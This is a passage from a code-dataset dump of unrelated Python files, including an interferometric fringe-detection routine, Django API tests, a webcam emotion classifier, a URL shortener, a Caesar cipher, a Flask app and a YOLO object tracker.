intersection\r\n AR = [[xymbloop[6], -1],\r\n [1, 0]]\r\n BR = [[-xymbloop[7]],\r\n [scan[str(i-1)][0][0]]]\r\n Rloopint, _, _, _ = np.linalg.lstsq(AR, BR, rcond=None)\r\n\r\n if Lloopint[1] < yc and Lloopint[1] > y_res and Rloopint[1] < yc and Rloopint[1] > y_res: #if both intersection solutions lies in range of image for scan(i).pos(1,1)\r\n if xymbloop[2] < 0: #if loop tilted down and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Rloopint[1]), np.round(Lloopint[1]))) #remove points between right loop intersection and left loop intersection\r\n elif xymbloop[2] > 0: #if loop tilted up and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Lloopint[1]), np.round(Rloopint[1]))) #remove points between left loop intersection and right loop intersection\r\n elif Lloopint[1] < yc and Lloopint[1] > y_res: #if only left loop intersection lies in range of image for scan(i).pos(1,1)\r\n if xymbloop[2] < 0: #if loop tilted down and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(xymbloop[1]), np.round(Rloopint[1]))) #remove points between ball shadow and left loop intersection\r\n elif xymbloop[2] > 0: #if loop tilted up and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Lloopint[1]), y_res)) #remove points between left loop intersection and bottom of image\r\n elif Rloopint[1] < yc and Rloopint[1] > y_res: #if only right loop intersection lies in range of image for scan(i).pos(1,1)\r\n if xymbloop[6] < 0: #if loop tilted down and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Rloopint[1]), y_res)) #remove points between right loop intersection and bottom of image\r\n elif xymbloop[6] > 0: #if loop tilted up and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(xymbloop[5]), np.round(Rloopint[1]))) #remove points between ball shadow and right loop intersection\r\n else:\r\n ytest = np.append(ytest, np.arange(np.round(yc), y_res)) #if neither intersections in range of image, remove points between ball center and bottom of image\r\n if np.size(ytest) != 0:\r\n ytest = np.unique(ytest.astype(int))\r\n scan[str(i-1)][0] = np.delete(scan[str(i-1)][0], ytest, axis=0)\r\n scan[str(i-1)][1] = np.delete(scan[str(i-1)][1], ytest, axis=0)\r\n\r\n fringe_pos = fringeimage[scan[str(i-1)][1], scan[str(i-1)][0]] < I_drop #scan, determine where intensitiies fall below I_drop\r\n index_trash = np.where(np.diff(fringe_pos))[0]\r\n #determine fringes based on minimum fringe width\r\n index_new = np.array([])\r\n for j in range(1, len(index_trash)):\r\n if index_trash[j] - index_trash[j-1] >= Iwidth_min: #if meets minimum fringe width\r\n index_new = np.append(index_new, index_trash[j])\r\n # if j == len(index_trash): #if last filtering (len(index_trash)-1 ends loop, so len(index_trash)-2 will be last j index)\r\n # if len(index_new) % 2 != 0: #if length of vals are odd (fringe scan needs start and end)\r\n # if scan[str(i-1)][0][0] > (Lloop_xvals - loop_avoid) and scan[str(i-1)][0][0] < (Rloop_xvals + loop_avoid): #if scan is above sphere shadow and loop\r\n # index_new = np.append(index_new, index_trash[j]) #add end point of fringe\r\n #determine if first or second scan segment is the fringe (i don't know what this does anymore...maybe deletes first \"fringe\" if too bright?)\r\n # if np.size(index_new) != 0: #if fringes detected in scan\r\n # if I_pos[(index_new[0]+1).astype(int)] >= I_drop:\r\n # index_new[0] = []\r\n\r\n j = 1\r\n n = 0\r\n center_approx[str(i-1)] = np.array([0, 0])\r\n if np.size(index_new) != 0: #if fringes detected in scan\r\n while j < len(index_new):\r\n avg = np.round((index_new[j] + index_new[j-1])/2).astype(int) #approximate fringe center is average location\r\n if fringeimage[scan[str(i-1)][1][avg], scan[str(i-1)][0][avg]] >= I_max:\r\n j += 1\r\n else:\r\n center_approx[str(i-1)] = np.vstack([center_approx[str(i-1)], [scan[str(i-1)][0][avg], scan[str(i-1)][1][avg]]])\r\n j += 2\r\n n += 1\r\n center_approx[str(i-1)] = np.delete(center_approx[str(i-1)], 0, axis=0)\r\n\r\n # fringeimagefig, fringeimageax = plt.subplots(1)\r\n # fringeimagefig.canvas.set_window_title('FringeImage')\r\n # fringeimageax.imshow(fringeimage, cmap='gray')\r\n # fringeimageax.set_ylim([y_res, 0])\r\n # fringeimageax.set_xlim([0, x_res])\r\n # fringeimageax.autoscale = False\r\n # for i in range(n_nodes):\r\n # fringeimageax.plot(center_approx[str(i)][:, 0], center_approx[str(i)][:, 1], 'g.')\r\n\r\n scan_width = np.round(scan_increase*max(np.diff(index_new))).astype(int) #determine max width of fringes, width of scan region * scan_increase will be scan width\r\n n_fringes, _ = np.shape(center_approx['0'])\r\n fringe = {}\r\n fringe_center = {}\r\n fringe_center['0'] = np.array([])\r\n for m in range(0, n_fringes):\r\n fringe[str(m)] = {}\r\n fringe[str(m)]['pf_fringe'] = np.array([])\r\n fringe[str(m)]['center'] = center_approx['0'][m, :]\r\n # sort nodes by fringe\r\n # determine number of fringes in each vertical scan, sort node location per fringe\r\n for i in range(2, n_nodes):\r\n n_fringes = np.shape(center_approx[str(i-1)])\r\n n_fringes = n_fringes[0]\r\n i_center = center_approx[str(i-1)]\r\n i_1_center = center_approx[str(i-2)]\r\n r_1, _ = np.shape(i_1_center)\r\n if r.round().astype(int) > r_1:\r\n padding = np.zeros((r.round().astype(int) - r_1, 2))\r\n i_1_center = np.append(i_1_center, padding, axis=0)\r\n i_1_center[i_1_center == 0] = math.inf #make inf to prevent accident closest center to (0,0)\r\n elif r_1 > r.round().astype(int)[0]:\r\n padding = np.zeros(r_1 - r.round().astype(int)[0], 2)\r\n i_center = np.append(i_center, padding, axis=0)\r\n i_center[i_center == 0] = math.inf\r\n # find fringe center in subsequent scans that is closest to the center of previous\r\n for j in range(0, n_fringes):\r\n # These don't appear to have been used in matlab\r\n # if i_center[j, 0] != math.inf:\r\n # residual = np.sqrt((i_center[j, 0] - i_1_center[:, 0])**2 + (i_center[j, 1] - i_1_center[:, 1])**2)\r\n # res_index = np.where(min(residual) == residual)[0]\r\n m = 0\r\n m_max = len(fringe)\r\n if m_max < 2:\r\n return 'failed', 'failed'\r\n newfringe = True\r\n\r\n while m < m_max:\r\n if np.size(fringe[str(m)]['center']) > 2:\r\n if i_center[j, 1] > fringe[str(m)]['center'][-1, 1] - scan_width and i_center[j, 1] < fringe[str(m)]['center'][-1, 1] + scan_width:\r\n fringe[str(m)]['center'] = np.vstack((fringe[str(m)]['center'], i_center[j, :]))\r\n newfringe = False\r\n break\r\n else:\r\n if i_center[j, 1] > fringe[str(m)]['center'][-1] - scan_width and i_center[j, 1] < fringe[str(m)]['center'][-1] + scan_width:\r\n fringe[str(m)]['center'] = np.vstack((fringe[str(m)]['center'], i_center[j, :]))\r\n newfringe = False\r\n break\r\n m += 1\r\n if newfringe:\r\n fringe[str(m)] = {}\r\n fringe[str(m)]['pf_fringe'] = np.array([])\r\n fringe[str(m)]['center'] = i_center[j, :]\r\n\r\n # fit lines, determine approximate slope of fringes\r\n for m in range(0, len(fringe)):\r\n det_nodes = int(np.size(fringe[str(m)]['center'])/2)\r\n if det_nodes >= node_fringe_min: #only evaluate fringes with min number of nodes\r\n pf_fringe = np.polyfit(fringe[str(m)]['center'][:, 0], fringe[str(m)]['center'][:, 1], 1)\r\n if 'allpf_fringe' not in locals(): #checking if allpf_fringe exists\r\n allpf_fringe = np.array(pf_fringe)\r\n else:\r\n allpf_fringe = np.vstack((allpf_fringe, pf_fringe))\r\n fringe[str(m)]['pf_fringe'] = pf_fringe\r\n else:\r\n del fringe[str(m)]\r\n\r\n # genrate node scans and truncate image edge nodes\r\n slope_perp = -1/allpf_fringe[np.where(abs(allpf_fringe[:, 0]) == max(abs(allpf_fringe[:, 0]))), 0][0][0] #determine maximum abs() slope, calculate perpendicular\r\n scan_trunc = (np.ceil((abs(scan_width/slope_perp))/2) + edge_avoid).astype(int) #calculate amount of truncation at image edge in x due to fringe angle, add edge_avoid pixel safety\r\n for m in range(0, len(fringe)):\r\n fringe[str(m)]['center'][:, 1] = np.round(filter_conv(fringe[str(m)]['center'][:, 1], 3))\r\n fringe[str(m)]['X_top'] = np.round(fringe[str(m)]['center'][:, 0] - node_width/2) #generate scans based on node width, node center\r\n fringe[str(m)]['Y_top'] = np.round(fringe[str(m)]['center'][:, 1])\r\n fringe[str(m)]['X_endtop'] = np.round(fringe[str(m)]['center'][:, 0] + node_width/2)\r\n fringe[str(m)]['Y_endtop'] = np.round(fringe[str(m)]['center'][:, 1])\r\n if np.size(np.where(fringe[str(m)]['center'][:, 0] - node_width/2 < scan_trunc)) > 0:\r\n trunc_index = np.where(fringe[str(m)]['center'][:, 0] - node_width/2 < scan_trunc)[0]\r\n if len(trunc_index) > 1: #check if more than one node affected by truncation\r\n for n, val in enumerate(trunc_index):\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['X_top'][0] = scan_trunc\r\n if fringe[str(m)]['X_top'][1] <= scan_trunc:\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], 0, axis=1)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], 0, axis=1)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], 0, axis=1)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], 0, axis=1)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], 0, axis=1)\r\n if np.size(np.where(fringe[str(m)]['center'][:, 0] - node_width/2 >= x_res - scan_trunc)) > 0:\r\n trunc_index = np.where(fringe[str(m)]['center'][:, 0] - node_width/2 < scan_trunc)[0]\r\n if len(trunc_index) > 1: #check if more than one node affected by truncation\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['X_endtop'][-1] = x_res - scan_trunc\r\n if fringe[str(m)]['X_endtop'][-1] >= x_res - scan_trunc:\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], -1, axis=1)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], -1, axis=1)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], -1, axis=1)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], -1, axis=1)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], -1, axis=1)\r\n # check if average intensity is below threshold, in case node contains anomaly\r\n # disabled in matlab\r\n # L_center, _ = np.shape(fringe[str(m)]['center'])\r\n # for j in range(0, L_center):\r\n # index_erase = []\r\n # scan_inc = (fringe[str(m)]['X_endtop'][j] - fringe[str(m)]['X_top'][j])/7\r\n # for i in range(1, 6):\r\n # x_scan = fringe[str(m)]['X_top'][j] + np.round(i*scan_inc)\r\n # y_scan = fringe[str(m)]['Y_top'][j] - np.arange(np.round(scan_width/2), fringe[str(m)]['Y_top'][j] + np.round(scan_width/2))\r\n # I_test = fringeimage[y_scan, x_scan]\r\n #\r\n\r\n # if all elements removed from fringe, delete fringe\r\n if np.size(fringe[str(m)]) == 0:\r\n del fringe[str(m)]\r\n if m == 0:\r\n yc_fringe = np.polyval(allpf_fringe[m, :], xc)\r\n else:\r\n yc_fringe = np.vstack((yc_fringe, np.polyval(allpf_fringe[m, :], xc)))\r\n\r\n # Allmode - calculate the two fringes surrounding the sphere center\r\n listfringes = np.arange(0, len(fringe))\r\n if allmode == 'center':\r\n fringe2 = {}\r\n ball_fringe = yc_fringe - yc\r\n for i in range(0, 2):\r\n index = np.where(min(abs(ball_fringe)) == abs(ball_fringe))[0][0]\r\n fringe2[str(i)] = fringe[str(listfringes[index])]\r\n ball_fringe = np.delete(ball_fringe, index)\r\n listfringes = np.delete(listfringes, index)\r\n return fringe2, scan_width\r\n","sub_path":"Fringefinder/FringefinderFuncs.py","file_name":"FringefinderFuncs.py","file_ext":"py","file_size_in_byte":57495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"318411525","text":"from django.test import TestCase\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\n\nfrom rest_framework.test import APIClient\nfrom rest_framework import status\n\nfrom core.models import Ingredient\nfrom recipe.serializers import IngredientSerializer\n\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef create_user(**kwargs):\n return get_user_model().objects.create_user(**kwargs)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\" Test the publicly available ingredients API\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_login_required(self):\n \"\"\"Test that login is required for retrieving ingredients\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateTagsApiTests(TestCase):\n \"\"\" Test the private ingredients API\"\"\"\n\n def setUp(self):\n self.user = create_user(\n email='test@test.com',\n password='test123',\n name='name'\n )\n self.client = APIClient()\n self.client.force_authenticate(user=self.user)\n # Authenticated user in the tests\n\n def test_retrieve_ingredient_list(self):\n \"\"\"Test retrieving a list of ingredients\"\"\"\n Ingredient.objects.create(user=self.user, name='Kale')\n Ingredient.objects.create(user=self.user, name='Salt')\n res = self.client.get(INGREDIENTS_URL)\n ingredients = Ingredient.objects.all().order_by('-name')\n serializer = IngredientSerializer(ingredients, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Test retrieving a list of ingredients\"\"\"\n user2 = create_user(email='user2@test.com',\n password='test123',\n name='user2')\n Ingredient.objects.create(user=user2, name='Vinegar')\n ingredient = Ingredient.objects.create(user=self.user, name='Tumeric')\n res = self.client.get(INGREDIENTS_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], ingredient.name)\n\n def test_create_ingredient_successful(self):\n \"\"\"Test create a new ingredient\"\"\"\n payload = {'name': 'Cabbage'}\n self.client.post(INGREDIENTS_URL, payload)\n exists = Ingredient.objects.filter(user=self.user,\n name=payload['name']\n ).exists()\n self.assertTrue(exists)\n\n def test_create_tag_ingredient_invalid(self):\n \"\"\"Test creating invalid ingredient fails\"\"\"\n payload = {'name': ''}\n res = self.client.post(INGREDIENTS_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190702374","text":"import cv2\nimport numpy as np\nfrom keras.models import load_model\nimport serial\nser = serial.Serial('COM4', 9600, timeout=1)\nimport os\nimport random\n\nrandom.seed(None)\n\nfaceCascade = cv2.CascadeClassifier('haarcascade_frontalface_alt2.xml')\n\nvideo_capture = cv2.VideoCapture(0)\narea = video_capture.get(3) * video_capture.get(4)\n\nmodel = load_model('models/model_5-49-0.62.hdf5')\nmodel.get_config()\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\nnumFrames = 30\n\nhappyCount = 0\nsadCount = 0\nneutralCount = 0\n\n#happy = os.listdir('happy')\n#sad = os.listdir('sad')\n#neutral = os.listdir('neutral')\n\n#index = 0\n\ntarget = ['angry', 'disgust', 'fear', 'happy', 'sad', 'surprise', 'neutral']\n\nwhile True:\n ret, frame = video_capture.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1)\n \n if faces.__len__() == 0:\n cv2.imshow('Frame', frame)\n cv2.waitKey(1)\n continue\n else:\n for (x, y, w, h) in faces:\n if w*h > 0.06 * area:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2, 5)\n face_crop = frame[y:y + h, x:x + w]\n face_crop = cv2.resize(face_crop, (48, 48))\n face_crop = cv2.cvtColor(face_crop, cv2.COLOR_BGR2GRAY)\n face_crop = face_crop.astype('float32') / 255\n face_crop = np.asarray(face_crop)\n face_crop = face_crop.reshape(1, 1, face_crop.shape[0], face_crop.shape[1])\n result = target[np.argmax(model.predict(face_crop))]\n\n if(result == 'happy' or result == 'surprise'):\n happyCount += 1\n\n elif(result == 'sad' or result == 'angry' or result == 'fear'):\n sadCount += 1\n\n elif(result == 'neutral'):\n neutralCount += 1\n\n numFrames -= 1\n\n cv2.putText(frame, result, (x, y), font, 1, (200, 0, 0), 3, cv2.LINE_AA)\n if numFrames == 0:\n break\n\n if numFrames == 0:\n break\n\n #print(result)\n cv2.imshow('Frame', frame)\n if (cv2.waitKey(1) & 0xFF == ord('q')):\n break\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\nemotion = np.argmax(np.array([happyCount, sadCount, neutralCount]))\n\nif emotion == 0:\n print(\"happy\")\n ser.write(b'h')\n ser.close()\n #with open('test.txt', 'w') as f:\n # f.write('happy/' + str(happy[random.randint(0, happy.__len__()-1)]) + '\\n')\nelif emotion == 1:\n print(\"sad\")\n ser.write(b's')\n ser.close()\n #with open('test.txt', 'w') as f:\n #f.write('sad/' + str(sad[random.randint(0, sad.__len__()-1)]) + '\\n')\nelse:\n print(\"nutral\")\n ser.write(b'n')\n ser.close()\n #with open('test.txt', 'w') as f:\n #f.write('neutral/' + str(neutral[random.randint(0, neutral.__len__()-1)]) + '\\n')\n\n #cv2.imshow('Video', frame)\n\n\n","sub_path":"Liquid-Player-master/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"188384202","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom .forms import Url_Form\nfrom .models import Short_Url\nfrom .shortner import Shortner\n\n\n# Create your views here.\ndef make(request):\n form = Url_Form(request.POST)\n b = \"\"\n a = \"\"\n if request.method == 'GET':\n form = Url_Form\n return render(request, 'main.html', {'form': form})\n if request.method == 'POST':\n new_url = Short_Url.objects.filter(long_url=request.POST['long_url'])\n if new_url:\n b = new_url[0]\n else:\n if form.is_valid():\n new_url = form.save(commit=False)\n new_url.short_url = Shortner().issue_token()\n a = new_url\n new_url.save()\n else:\n form = Url_Form()\n a = \"Invalid Url\"\n context = {\n 'form': form,\n 'a': a,\n 'b':b\n }\n return render(request, 'main.html', context)\n\n\ndef home(request, token, copy=None):\n if copy:\n long_url = Short_Url.objects.filter(short_url=token)[0]\n long_url.copy2clip(request.META.get('HTTP_REFERER'))\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n long_url = Short_Url.objects.filter(short_url=token)[0]\n return redirect(long_url.long_url)\n","sub_path":"shorter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"105788372","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/confirmation/etc/FConfirmationEventHook.py\"\nfrom FOperationsHook import DefaultHook\nimport types\nfrom FOperationsTypeComparators import PrimitiveTypeComparator\n\nclass ConfirmationEventHook(DefaultHook):\n\n def __init__(self, moduleName, hookName):\n DefaultHook.__init__(self, moduleName, hookName, PrimitiveTypeComparator(bool))\n\n def IsSatisfiedBy(self, fObject, trade = None):\n if trade == None:\n return self.CallHook(fObject)\n return self.CallHook(fObject, trade)","sub_path":"Extensions/Default/FPythonCode/FConfirmationEventHook.py","file_name":"FConfirmationEventHook.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"200221961","text":"# coding:utf-8\nfrom __future__ import division\nimport time\nimport numpy as np\nimport cv2\nfrom PIL import Image, ImageFont, ImageDraw\nfrom yolo import YOLO\nfrom utils.sort import sort_image, Sort\nfrom collections import deque\n\npts = [deque(maxlen=30) for _ in range(9999)]\nnp.random.seed(100)\nCOLORS = np.random.randint(0, 255, size=(200, 3), dtype=\"uint8\")\n\nmp4 = cv2.VideoCapture('/home/bhap/Documents/Video/test3.MP4')\nmodel_path = '/home/bhap/Pytorch_test/YoloV3_Sort/model_data/bdd.pth'\nCAMERA = False\n\ndef main(yolo):\n\n capture = cv2.VideoCapture(0)\n tracker = Sort(max_age=10, min_hits=3) # 存储的帧数和连续关联的帧数\n fps = 0.0\n\n while True:\n\n t1 = time.time()\n\n if CAMERA:\n ref, frame = capture.read()\n else:\n ref, frame = mp4.read()\n if ref != True:\n break\n\n # 格式转变 BGR2RGB\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # 转变成Image\n frame = Image.fromarray(np.uint8(frame))\n # 进行检测\n boxs, classes = yolo.sort_detect_image(frame)\n\n out_boxes, out_classes, object_id = sort_image(tracker, boxs, classes)\n\n font = ImageFont.truetype(font='model_data/simhei.ttf',\n size=np.floor(2e-2 * frame.size[1] + 0.5).astype('int32'))\n thickness = (frame.size[0] + frame.size[1]) // 800\n\n for i, c in enumerate(out_classes):\n predicted_class = yolo.class_names[c]\n id = int(object_id[i])\n left, top, right, bottom = out_boxes[i]\n color = tuple([int(k) for k in COLORS[id % len(COLORS)]])\n\n label = '{} id:{}'.format(predicted_class, id)\n draw = ImageDraw.Draw(frame)\n label_size = draw.textsize(label, font)\n label = label.encode('utf-8')\n\n if top - label_size[1] >= 0:\n text_origin = np.array([left, top - label_size[1]])\n else:\n text_origin = np.array([left, top + 1])\n\n for j in range(thickness):\n draw.rectangle(\n [left + j, top + j, right - j, bottom - j], outline=color)\n draw.rectangle(\n [tuple(text_origin), tuple(text_origin + label_size)], fill=color)\n draw.text(text_origin, str(label), fill=(0, 0, 0), font=font)\n del draw\n\n frame = np.array(frame)\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n fps = (fps + (1. / (time.time() - t1))) / 2\n frame = cv2.putText(frame, \"fps= %.2f\" % (fps), (0, 40), cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 1, (0, 255, 0), 2)\n cv2.imshow('mp4', frame)\n\n cv = cv2.waitKey(30) & 0xff\n\n if cv == 27:\n capture.release()\n break\n\nif __name__ == '__main__':\n main(YOLO())","sub_path":"yolo_sort.py","file_name":"yolo_sort.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496457976","text":"#task_cipher_caesar\n\ndef encode(str, offset = 0):\n\tif not offset: return str\n\tupper_case_letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\tupper_q = len(upper_case_letters)\n\tlower_case_letters = \"abcdefghijklmnopqrstuvwxyz\"\n\tlower_q = len(lower_case_letters)\t\n\tencode_str = []\n\tfor char in str:\n\t\tupper_index = upper_case_letters.find(char)\n\t\tlower_index = lower_case_letters.find(char)\n\t\tif upper_index != -1:\n\t\t\tencode_str.append(upper_case_letters[(upper_index+offset)%upper_q])\n\t\telif lower_index != -1:\t\n\t\t\tencode_str.append(lower_case_letters[(lower_index+offset)%lower_q])\n\t\telse:\n\t\t\tencode_str.append(char)\n\treturn ''.join(encode_str)\n\t\ndef decode(str, offset = 0):\n\tif not offset: return str\n\treturn encode(str, -offset)","sub_path":"task_cipher_caesar.py","file_name":"task_cipher_caesar.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"54320979","text":"from django.conf.urls import patterns, include, url\nfrom djangobook.views import hello, current_datetime, hours_ahead, user_browser, display_meta\nfrom books import views\nfrom contact.views import contact\nfrom django.contrib import admin\nadmin.autodiscover()\n\n\nurlpatterns = patterns('',\n\turl(r'^admin/', include(admin.site.urls)),\n\turl(r'^hello/$', hello),\n\turl(r'^time/$', current_datetime),\n\turl(r'^another-time-page/$', current_datetime),\n\turl(r'^time/plus/(\\d{1,2})/$', hours_ahead),\n\turl(r'^browser/$', user_browser),\n\turl(r'^displaymeta/$', display_meta),\n\turl(r'^search/$', views.search),\n\turl(r'^contact-us/$', contact),\n)\n","sub_path":"djangobook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"196007304","text":"#!/usr/bin/python3\n# Python script that starts a flask application on 0.0.0.0 port 5000/ with\n# variables: Show if number is even or odd\nfrom flask import Flask, render_template\nfrom models import storage\napp = Flask(__name__)\napp.url_map.strict_slashes = False\napp.jinja_env.trim_blocks = True\napp.jinja_env.lstrip_blocks = True\n\n\n@app.teardown_appcontext\ndef teardown_app(exception):\n \"\"\"Calls Storage close on appcontext\"\"\"\n storage.close()\n\n\n@app.route('/states')\ndef states():\n states = []\n for key, values in storage.all('State').items():\n states.append(values)\n return render_template('9-states.html', states=states)\n\n\n@app.route('/states/')\ndef states_var(id=None):\n cities = []\n for key, values in storage.all('City').items():\n if values.state_id == str(id):\n cities.append(values)\n\n name = None\n for key, values in storage.all('State').items():\n if values.id == str(id):\n name = values.name\n\n if len(cities) == 0 and name is None:\n return render_template('9-states.html', err=1)\n\n return render_template('9-states.html', name=name, cities=cities)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"355040683","text":"# Settings\nfrom django.conf import settings\n# 3rd party helpers\nfrom requests.exceptions import HTTPError\nfrom typing import Tuple\nfrom lxml.objectify import ElementMaker\nimport json\n# Views\nfrom .utils import Storage\nfrom .json_view import JsonView\n# VDT BE Components\nfrom vdt_python_sdk.views import vdt_python_sdk\n\nE = ElementMaker(namespace=\"http://xml.vidispine.com/schema/vidispine\", annotate=False,\n nsmap={\"vs\": \"http://xml.vidispine.com/schema/vidispine\"})\n\n# Unified responses:\nresponseBE = Tuple[Storage, int]\n\n__author__ = 'anton'\n\n\"\"\" StorageView\n some of the typical API-calls are used here\n\"\"\"\n\n\nclass StoragesView(JsonView):\n def get(self, request) -> responseBE:\n try:\n auth = dict(username=settings.VS_USERNAME, password=settings.VS_PASSWORD)\n\n # Query parameters\n status = request.GET.get('status', None)\n except KeyError:\n return Storage(dict(content=\"No auth\")), 401\n except ValueError:\n raise Exception(\"Invalid request body or header\")\n\n try:\n storages = vdt_python_sdk.get_storages(vsurl=settings.VSAPI_BASE, auth=auth,\n status=status,\n accept='application/json')\n except HTTPError as e:\n return Storage(dict(url=e.request.path_url,\n message=e.response.content.decode('utf-8'))), e.response.status_code\n\n return storages, 200\n\n\nclass StorageImportablesView(JsonView):\n def get(self, request, storage_id: str) -> responseBE:\n try:\n auth = dict(username=settings.VS_USERNAME, password=settings.VS_PASSWORD)\n matrix_params = json.loads(request.GET.get('matrix'))\n first = matrix_params.get('first', None)\n number = matrix_params.get('number', None)\n state = matrix_params.get('state', 'CLOSED')\n except KeyError:\n return Storage(dict(content=\"No auth\")), 401\n except ValueError:\n raise Exception(\"Invalid request body or header\")\n\n try:\n files = vdt_python_sdk.get_storage_importable(vsurl=settings.VSAPI_BASE, auth=auth,\n storage_id=storage_id, state=state,\n first=first,\n number=number,\n accept='application/json')\n except HTTPError as e:\n return Storage(dict(url=e.request.path_url,\n message=e.response.content.decode('utf-8'))), e.response.status_code\n\n returned_files = []\n if files['hits'] != 0:\n for file in files['element']:\n if file['file']['state'] == state:\n returned_files.append(file)\n files['element'] = returned_files\n return files, 200\n\n\nclass FileImportView(JsonView):\n def post(self, request, storage_id: str, file_id: str) -> responseBE:\n try:\n auth = dict(username=settings.VS_USERNAME, password=settings.VS_PASSWORD)\n body = request.body.decode(\"utf-8\")\n data = json.loads(body)\n\n # Voluntary variables\n tag = data.get('tag', None)\n except KeyError:\n return Storage(dict(content=\"No auth\")), 401\n except ValueError:\n raise Exception(\"Invalid request body or header\")\n\n try:\n file_import = vdt_python_sdk.start_file_import(vsurl=settings.VSAPI_BASE, auth=auth,\n storage_id=storage_id, file_id=file_id,\n tag=tag,\n accept='application/json')\n except HTTPError as e:\n return Storage(dict(url=e.request.path_url,\n message=e.response.content.decode('utf-8'))), e.response.status_code\n\n return file_import, 200\n","sub_path":"app/views/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"245747119","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport csv\nimport pandas as pd\nimport numpy as np\nfrom bs4 import BeautifulSoup\nfrom django.http import JsonResponse\n\ndef parse_csv(csvFile):\n files = csvFile\n data = 